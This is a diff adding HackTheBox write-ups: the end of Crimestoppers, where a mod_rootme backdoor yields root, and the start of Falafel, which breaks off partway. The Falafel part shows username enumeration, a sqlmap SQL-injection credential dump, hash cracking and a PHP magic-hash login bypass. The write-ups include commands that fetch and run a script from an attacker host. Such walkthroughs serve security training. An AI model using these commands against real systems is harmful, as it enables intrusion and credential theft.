+
+
+
+
+
+
+ Elliot.
+
+
+
+
+ We got a suspicious email from the DarkArmy claiming there is a
+ Remote Code Execution bug on our Webserver. I don't trust them
+ and ran rkhunter, it reported that there a rootkit installed
+ called: apache_modrootme backdoor.
+
+
+
+
+ According to my research, if this rootkit was on the server I
+ should be able to run "nc localhost 80" and then type get root to
+ get
+
+ nc localhost 80
+
+
+
+
+ get root
+
+
+
+
+
+
+
+
+
+
+
+
+
+ From - Sat Dec 16 12:53:19 2017
+ X-Mozilla-Status: 0001
+ X-Mozilla-Status2: 00000000
+ FCC: imap://dom%40crimestoppers.htb@crimestoppers.htb/Sent
+ X-Identity-Key: id1
+ X-Account-Key: account1
+ To: elliot@ecorp.htb
+ From: dom
+ Subject: Potential Rootkit
+ Message-ID: <1f42c857-08fd-1957-8a2d-fa9a4697ffa5@crimestoppers.htb>
+ Date: Sat, 16 Dec 2017 12:53:18 -0800
+ X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
+ attachmentreminder=0; deliveryformat=4
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+ Thunderbird/52.5.0
+ MIME-Version: 1.0
+ Content-Type: text/html; charset=utf-8
+ Content-Language: en-US
+ Content-Transfer-Encoding: 8bit
+
+
+
+
+
+
+ Elliot.
+
+
+
+
+ We got a suspicious email from the DarkArmy claiming there is a
+ Remote Code Execution bug on our Webserver. I don't trust them
+ and ran rkhunter, it reported that there a rootkit installed
+ called: apache_modrootme backdoor.
+
+
+
+
+ According to my research, if this rootkit was on the server I
+ should be able to run "nc localhost 80" and then type get root to
+ get
+
+ nc localhost 80
+
+
+
+
+ get root
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Now we have a hint towards a certain rootkit/backdoor called **apache_modrootme** , let's run linpeas.sh on the box if it gets picked up:
+
+
+ [terminal 1]
+ [ 10.10.14.8/23 ] [ /dev/pts/14 ] [~/HTB/Crimestoppers]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.8/23 ] [ /dev/pts/14 ] [~/HTB/Crimestoppers]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.10.10.80 - - [10/Jul/2021 13:56:57] "GET /linpeas.sh HTTP/1.1" 200 -
+
+ [terminal 2]
+ dom@ubuntu:~$ wget http://10.10.14.8:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-07-10 05:05:15-- http://10.10.14.8:9090/linpeas.sh
+ Connecting to 10.10.14.8:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[=============================================================================================================>] 333.85K 117KB/s in 2.8s
+
+ 2021-07-10 05:05:19 (117 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ dom@ubuntu:~$ chmod +x /tmp/peas.sh
+ dom@ubuntu:~$ /tmp/peas.sh
+
+
+
+` 
+
+Now we don't necessarily get the modrootme apache string we wanted, but we do get the confirmation that of our suspicion earlier, we are able to read logs of apache2, and chances are, that we may get passwords in here. So let's take a look:
+
+
+
+
+ dom@ubuntu:/var/log/apache2$ zcat access.log.* | grep -v 'OPTIONS\|HEAD\|POST\|GET' | grep ' 400 '
+
+ gzip: access.log.1: not in gzip format
+ ::1 - - [25/Dec/2017:12:59:19 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:00:00 -0800] "FunSociety" 400 0 "-" "-"
+ 127.0.0.1 - - [25/Dec/2017:13:11:04 -0800] "FunSociety" 400 0 "-" "-"
+ 10.10.10.80 - - [25/Dec/2017:13:11:22 -0800] "FunSociety" 400 0 "-" "-"
+ 10.10.10.80 - - [25/Dec/2017:13:11:32 -0800] "42PA" 400 0 "-" "-"
+ 10.10.10.80 - - [25/Dec/2017:13:11:46 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:13:12 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:13:52 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:13:55 -0800] "FunSociety" 400 0 "-" "-"
+ ::1 - - [25/Dec/2017:13:14:00 -0800] "FunSociety" 400 0 "-" "-"
+ 10.10.14.3 - - [25/Dec/2017:13:14:53 -0800] "FunSociety" 400 0 "-" "-"
+ 10.10.10.80 - - [22/Dec/2017:10:17:17 -0800] "sdf" 400 0 "-" "-"
+ 10.10.10.80 - - [22/Dec/2017:10:17:34 -0800] "Get FunSociety" 400 301 "-" "-"
+ ::1 - - [23/Dec/2017:14:39:17 -0800] "get root" 400 301 "-" "-"
+ ::1 - - [23/Dec/2017:14:40:53 -0800] "get-root" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:41:02 -0800] "root" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:43:28 -0800] "HackTheBox" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:43:34 -0800] "darkarmy" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:46:50 -0800] "WhiteRose@DarkArmy.htb" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:48:09 -0800] "HackTheBox" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:48:30 -0800] "/var/www/html/uploads/whiterose.txt" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:51:37 -0800] "bash" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:14:57:40 -0800] "rootme" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:04:41 -0800] "hACKtHEbOX" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:04:52 -0800] "DmogXdiNct" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:04 -0800] "ElnfYehObu" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:12 -0800] "FomeZfkLav" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:21 -0800] "dMOGxDInCT" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:33 -0800] "eLNFyEHoBU" 400 0 "-" "-"
+ ::1 - - [23/Dec/2017:15:05:46 -0800] "fOMEzFKlAV" 400 0 "-" "-"
+
+
+
+And when we take a look at apache's access logs we see a bunch of requests that have been made with the passphrase **FunSociety** and **get-root** so we put the pieces together by taking a look at the modrootme github repository [here](https://github.com/sajith/mod-rootme): and we see that we need to do the following:
+
+
+ nc localhost 80
+ get root
+ id
+
+
+
+So let's try it:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/15 ] [~/HTB/Crimestoppers]
+ → nc 10.10.10.80 80
+ GET FunSociety
+ rootme-0.5 DarkArmy Edition Ready
+
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ root@ubuntu:/# cd ~
+ cd ~
+
+ root@ubuntu:/root# cat root.txt
+ cat root.txt
+ 6fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get a root shell and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
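Review bot: the command list given after "we see that we need to do the following" (`nc localhost 80` / `get root` / `id`) does not match the session that actually works a few lines later, which sends `GET FunSociety` and is answered with `rootme-0.5 DarkArmy Edition Ready`. The draft email's `get root` is only the hint; in the access log excerpt, `"Get FunSociety" 400 301` and `"get root" 400 301` are the only two entries with a non-zero response size, and that is how the writeup infers the passphrase on this box is FunSociety rather than the `get root` from the email. Say that explicitly and put `GET FunSociety` in the command list so the reader is not told to type the wrong string; it is also worth a sentence that these bare-token `400` lines are exactly the trace a defender would grep for, since the backdoor's trigger lands in the log in clear. Two markdown artifacts in the same hunk: the line containing only a backtick after `/tmp/peas.sh` looks like a leftover from an image embed and will open an unterminated inline code span, and the Conclusion's "Here we can see the progress graph :" has nothing under it; either restore the screenshots or delete the stray backtick and the dangling sentence. Minor wording: "we do get the confirmation that of our suspicion earlier" should read "we do get confirmation of our earlier suspicion: as a member of adm we can read the apache2 logs", and "let's run linpeas.sh on the box if it gets picked up" should say what is expected to be picked up (the apache_modrootme hint).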
diff --git a/Hard/9.md b/Hard/9.md
new file mode 100644
index 0000000..cb8b4ee
--- /dev/null
+++ b/Hard/9.md
@@ -0,0 +1,1144 @@
+# Falafel Writeup
+
+
+
+## Introduction :
+
+Falafel is a hard linux box released back in Febuary 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Falafel]
+ → sudo nmap -vvv -sTU -p- 10.10.10.73 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 22/tcp on 10.10.10.73
+ Discovered open port 80/tcp on 10.10.10.73
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [~/_HTB/Falafel]
+ → sudo nmap -sCV -p22,80 10.10.10.73
+ Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 11:47 CET
+ Nmap scan report for 10.10.10.73
+ Host is up (0.040s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
+ | 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
+ |_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ | http-robots.txt: 1 disallowed entry
+ |_/*.txt
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Falafel Lovers
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Here we are hinted at 2 things : First the login page top right and the username "IT" at the domain name "falafel.htb". So let's check out the login page which is a php page:
+
+
+
+So here we try a standard SQL injection **' or 1=1**
+
+
+
+next we'll try something random **nothing:nowhere** :
+
+
+
+And here we get a different error message "Try again.." so we can see here that using the admin username gives us a different error message. so let's enumerate this with gobuster and wfuzz:
+
+
+ apt install seclists -y
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~]
+ → gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -u http://10.10.10.73
+
+
+
+Let gobuster run in the background, and let's check what the post request exactly is from burpsuite:
+
+
+
+So here we see it is a POST request to login.php with the parameters **username** and **password**
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~/_HTB/Falafel]
+ → cp /usr/share/seclists/Usernames/Names/names.txt .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~/_HTB/Falafel]
+ → l
+ total 80K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 13:14 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+
+
+now we're going to use seclists' names.txt wordlist with wfuzz:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~/_HTB/Falafel]
+ → wfuzz -c -z files,names.txt --sc 200 -d "username=FUZZ&password;=IppsecRocks" http://10.10.10.73/login.php
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~]
+ → wfuzz -c -w names.txt --sc 200 -d "username=FUZZ&password;=IppsecRocks" http://10.10.10.73/login.php 2>/dev/null
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.73/login.php
+ Total requests: 10177
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000003: 200 102 L 657 W 7074 Ch "aarika"
+ 000000018: 200 102 L 657 W 7074 Ch "abdallah"
+ 000000017: 200 102 L 657 W 7074 Ch "abdalla"
+ 000000015: 200 102 L 657 W 7074 Ch "abby"
+ 000000014: 200 102 L 657 W 7074 Ch "abbie"
+ 000000007: 200 102 L 657 W 7074 Ch "abagael"
+ 000000001: 200 102 L 657 W 7074 Ch "aaliyah"
+ 000000011: 200 102 L 657 W 7074 Ch "abbe"
+ 000000010: 200 102 L 657 W 7074 Ch "abbas"
+ 000000008: 200 102 L 657 W 7074 Ch "abagail"
+ 000000009: 200 102 L 657 W 7074 Ch "abahri"
+ 000000005: 200 102 L 657 W 7074 Ch "aartjan"
+ 000000006: 200 102 L 657 W 7074 Ch "aarushi"
+ 000000002: 200 102 L 657 W 7074 Ch "aaren"
+ 000000021: 200 102 L 657 W 7074 Ch "abe"
+ 000000049: 200 102 L 657 W 7074 Ch "adalyn"
+ 000000025: 200 102 L 657 W 7074 Ch "abigael"
+ 000000060: 200 102 L 657 W 7074 Ch "addy"
+ 000000033: 200 102 L 657 W 7074 Ch "abriel"
+ 000000004: 200 102 L 657 W 7074 Ch "aaron"
+ 000000019: 200 102 L 657 W 7074 Ch "abdul"
+ 000000058: 200 102 L 657 W 7074 Ch "addison"
+ 000000055: 200 102 L 657 W 7074 Ch "addia"
+ 000000054: 200 102 L 657 W 7074 Ch "addi"
+ 000000056: 200 102 L 657 W 7074 Ch "addie"
+ 000000053: 200 102 L 657 W 7074 Ch "adda"
+ 000000057: 200 102 L 657 W 7074 Ch "addilyn"
+ 000000059: 200 102 L 657 W 7074 Ch "addons"
+ 000000051: 200 102 L 657 W 7074 Ch "adan"
+ 000000048: 200 102 L 657 W 7074 Ch "adaline"
+ 000000050: 200 102 L 657 W 7074 Ch "adam"
+ 000000047: 200 102 L 657 W 7074 Ch "adalia"
+ 000000046: 200 102 L 657 W 7074 Ch "adair"
+ 000000045: 200 102 L 657 W 7074 Ch "adah"
+ 000000052: 200 102 L 657 W 7074 Ch "adara"
+ ^C
+ Total time: 0
+ Processed Requests: 35
+ Filtered Requests: 0
+ Requests/sec.: 0
+
+
+
+Now we see that we get alot of responses that are all 657Words long, but as you can see they are not the usernames we want like the username admin we found earlier. Since we know admin username got us a different response, it's safe to assume this is not the same length as 657 so we're going to filter out the responses that are 657 words long:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~/_HTB/Falafel]
+ → wfuzz -c -w names.txt --hw 657 -d "username=FUZZ&password;=IppsecRocks" http://10.10.10.73/login.php 2>/dev/null
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.73/login.php
+ Total requests: 10177
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000086: 200 102 L 659 W 7091 Ch "admin"
+ 000001886: 200 102 L 659 W 7091 Ch "chris"
+ ^C
+ Total time: 0
+ Processed Requests: 2603
+ Filtered Requests: 2601
+ Requests/sec.: 0
+
+
+
+And there we have it, so we have 2 usernames : admin and chris. In the meantime, gobuster finished in the background, and we get a few interesting pages:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~]
+ → gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -u http://10.10.10.73
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.73
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: txt,php
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/12/21 13:08:51 Starting gobuster
+ ===============================================================
+ /images (Status: 301)
+ /index.php (Status: 200)
+ /login.php (Status: 200)
+ /profile.php (Status: 302)
+ /uploads (Status: 301)
+ /header.php (Status: 200)
+ /assets (Status: 301)
+ /footer.php (Status: 200)
+ /upload.php (Status: 302)
+ /css (Status: 301)
+ /style.php (Status: 200)
+ /js (Status: 301)
+ /logout.php (Status: 302)
+ /robots.txt (Status: 200)
+ **/cyberlaw.txt (Status: 200)**
+ /connection.php (Status: 200)
+ /server-status (Status: 403)
+ Progress: 173551 / 220561 (78.69%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2020/12/21 13:41:18 Finished
+ ===============================================================
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~]
+ → curl http://10.10.10.73/cyberlaw.txt
+ From: Falafel Network Admin (admin@falafel.htb)
+ Subject: URGENT!! MALICIOUS SITE TAKE OVER!
+ Date: November 25, 2017 3:30:58 PM PDT
+ To: lawyers@falafel.htb, devs@falafel.htb
+ Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
+ Mime-Version: 1.0
+ X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
+ X-Spam-Level: ***
+
+ A user named "chris" has informed me that he could log into MY account without knowing the password,
+ then take FULL CONTROL of the website using the image upload feature.
+ We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
+ so I have no idea how he did it.
+
+ Dear lawyers, please handle him. I believe Cyberlaw is on our side.
+ Dear develpors, fix this broken site ASAP.
+
+ ~admin%
+
+
+Here we also see chris' username, and we get hinted at an image upload exploitation. So let's try to find chris' password. we could do it with hydra, but we'll try to get it through sql injection using sqlmap:
+
+ 
+
+Here i saved it as login.req to pass it to sqlmap:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~/_HTB/Falafel]
+ → l
+ total 84K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 13:54 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~/_HTB/Falafel]
+ → sqlmap -r login.req --batch --level 5 --risk 3 -p username,password
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.12#stable}
+ |_ -| . ["] | .'| . |
+ |___|_ [)]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 13:55:41 /2020-12-21/
+
+ [13:55:41] [INFO] parsing HTTP request from 'login.req'
+ [13:55:41] [WARNING] provided parameters 'username, password' are not inside the Cookie
+ [13:55:41] [INFO] testing connection to the target URL
+ [13:55:41] [INFO] checking if the target is protected by some kind of WAF/IPS
+ [13:55:41] [INFO] testing if the target URL content is stable
+ [13:55:42] [INFO] target URL content is stable
+ [13:55:42] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
+ [13:55:42] [INFO] testing for SQL injection on POST parameter 'username'
+ [13:55:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [...]
+
+
+Basically here sqlmap finds nothing so you need to tell sqlmap that there is an error message that isn't what we want and that is "Wrong identification : username" or in short "Wrong identification" so we specify that and let it run again:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~/_HTB/Falafel]
+ → sqlmap -r login.req --batch --level 5 --risk 3 --string "Wrong identification" -p username,password
+ ___
+ __H__
+ ___ ___[)]_____ ___ ___ {1.4.12#stable}
+ |_ -| . ["] | .'| . |
+ |___|_ [(]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 14:00:21 /2020-12-21/
+
+ [14:00:21] [INFO] parsing HTTP request from 'login.req'
+ [14:00:21] [WARNING] provided parameters 'username, password' are not inside the Cookie
+ [14:00:21] [INFO] testing connection to the target URL
+ [14:00:21] [INFO] testing if the provided string is within the target URL page content
+ [14:00:21] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
+ [14:00:21] [INFO] testing for SQL injection on POST parameter 'username'
+ [14:00:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [14:00:22] [INFO] POST parameter 'username' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
+ [...]
+
+ [14:00:49] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
+ [14:00:50] [INFO] checking if the injection point on POST parameter 'username' is a false positive
+ POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+ sqlmap identified the following injection point(s) with a total of 538 HTTP(s) requests:
+ ---
+ Parameter: username (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: username=chris' AND 3892=3892-- yJzw&password;=password
+ ---
+ [14:00:51] [INFO] testing MySQL
+ [14:00:51] [INFO] confirming MySQL
+ [14:00:51] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL >= 5.0.0
+ [14:00:52] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.73'
+
+ [*] ending @ 14:00:52 /2020-12-21/
+
+
+And basically here we see that sqlmap found a Boolean-based blind vulnerability. so we're going to make sqlmap dump the results:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/21 ] [~/_HTB/Falafel]
+ → sqlmap -r login.req --batch --level 5 --risk 3 --string "Wrong identification" -p username,password --dump
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.12#stable}
+ |_ -| . [.] | .'| . |
+ |___|_ [.]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 14:02:54 /2020-12-21/
+
+ [14:02:54] [INFO] parsing HTTP request from 'login.req'
+ [14:02:54] [WARNING] provided parameters 'username, password' are not inside the Cookie
+ [14:02:54] [INFO] resuming back-end DBMS 'mysql'
+ [14:02:54] [INFO] testing connection to the target URL
+ [14:02:55] [INFO] testing if the provided string is within the target URL page content
+ sqlmap resumed the following injection point(s) from stored session:
+ ---
+ Parameter: username (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: username=chris' AND 3892=3892-- yJzw&password;=password
+ ---
+ [14:02:55] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL 5
+ [14:02:55] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
+ [14:02:55] [INFO] fetching current database
+ [14:02:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
+ [14:02:55] [INFO] retrieved: falafel
+ [14:02:57] [INFO] fetching tables for database: 'falafel'
+ [14:02:57] [INFO] fetching number of tables for database 'falafel'
+ [14:02:57] [INFO] retrieved: 1
+ [14:02:58] [INFO] retrieved: users
+ [14:02:59] [INFO] fetching columns for table 'users' in database 'falafel'
+ [14:02:59] [INFO] retrieved: 4
+ [14:03:00] [INFO] retrieved: ID
+ [14:03:01] [INFO] retrieved: username
+ [14:03:03] [INFO] retrieved: password
+ [14:03:06] [INFO] retrieved: role
+ [14:03:08] [INFO] fetching entries for table 'users' in database 'falafel'
+ [14:03:08] [INFO] fetching number of entries for table 'users' in database 'falafel'
+ [14:03:08] [INFO] retrieved: 2
+ [14:03:08] [INFO] retrieved: 1
+ [14:03:09] [INFO] retrieved: 0e462096931906507119562988736854
+ [14:03:21] [INFO] retrieved: admin
+ [14:03:23] [INFO] retrieved: admin
+ [14:03:25] [INFO] retrieved: 2
+ [14:03:26] [INFO] retrieved: d4ee02a22fc872e36d9e3751ba72ddc8
+ [14:03:39] [INFO] retrieved: normal
+ [14:03:41] [INFO] retrieved: chris
+ [14:03:43] [INFO] recognized possible password hashes in column 'password'
+ do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
+ do you want to crack them via a dictionary-based attack? [Y/n/q] Y
+ [14:03:43] [INFO] using hash method 'md5_generic_passwd'
+ what dictionary do you want to use?
+ [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
+ [2] custom dictionary file
+ [3] file with list of dictionary files
+ > 1
+ [14:03:43] [INFO] using default dictionary
+ do you want to use common password suffixes? (slow!) [y/N] N
+ [14:03:43] [INFO] starting dictionary-based cracking (md5_generic_passwd)
+ [14:03:43] [INFO] starting 4 processes
+ [14:03:47] [INFO] cracked password 'juggling' for user 'chris'
+ Database: falafel
+ Table: users
+ [2 entries]
+ +----+--------+---------------------------------------------+----------+
+ | ID | role | password | username |
+ +----+--------+---------------------------------------------+----------+
+ | 1 | admin | 0e462096931906507119562988736854 | admin |
+ | 2 | normal | d4ee02a22fc872e36d9e3751ba72ddc8 (juggling) | chris |
+ +----+--------+---------------------------------------------+----------+
+
+ [14:03:53] [INFO] table 'falafel.users' dumped to CSV file '/home/nothing/.local/share/sqlmap/output/10.10.10.73/dump/falafel/users.csv'
+ [14:03:53] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.73'
+
+ [*] ending @ 14:03:53 /2020-12-21/
+
+
+And we got password hashes and sqlmap cracked chris' hash for us, and thus we get the credentials **chris:juggling**! Of course it couldn't crack the admin hash otherwise that would be too easy, so let's login as chris:
+
+
+
+We get login successful, and we are now logged in as the chris user:
+
+
+
+And here there was a hint towards php hash collisions, basically when you look at the admin password's hash that sqlmap found earlier:
+
+
+ +----+--------+---------------------------------------------+----------+
+ | ID | role | password | username |
+ +----+--------+---------------------------------------------+----------+
+ | 1 | admin | 0e462096931906507119562988736854 | admin |
+ | 2 | normal | d4ee02a22fc872e36d9e3751ba72ddc8 (juggling) | chris |
+ +----+--------+---------------------------------------------+----------+
+
+
+
+You see that it begins with 0e and in php, when you use == it gets treated as 0 exponential whatever, and the result of 0^n will always be 0. therefore you need to use === to avoid it from being treated as 0 exponential something. Therefore, let's find any hash that begins with 0e such as the ones shown on this [page](https://news.ycombinator.com/item?id=9484757):
+
+
+
+Basically here you see that there are multiple md5 hashes that begin with 0e so theorically, it is possible that by using one of these passwords , the php interpreter would consider them as equal because 0eWhatever will always be the same with == so let's try **admin:240610708**
+
+
+
+And we this was successful ! From here we are prompted by the image url upload that was mentionned earlier in cyberlaw.txt Now let's get the box to connect back to us by requesting an image:
+
+
+
+Here was a rabbithole where wget being version 1.17.1 where it should be exploitable (40064.txt)
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/22 ] [~]
+ → cat $(locate 40064.txt)
+ =============================================
+ - Release date: 06.07.2016
+ - Discovered by: Dawid Golunski
+ - Severity: High
+ - CVE-2016-4971
+ =============================================
+
+
+ I. VULNERABILITY
+ -------------------------
+
+ GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution
+
+
+
+
+Basically this bug was about abusing wget's redirect feature to a ftp page to serve a different filename, such as getting an url that ends in .gif to make it download a php file, however for some reason it doesn't work on this box, so the intended solution was as follows:
+
+Going back at the profile page of admin we see a hint "Know your limits"
+
+
+
+Basically this is a hint towards wget's character limits
+
+
+
+And on linux the maximum filename length limit is 255 characters. So let's create a 255-character-long pattern :
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → locate pattern_create
+ /usr/bin/msf-pattern_create
+ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
+ Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
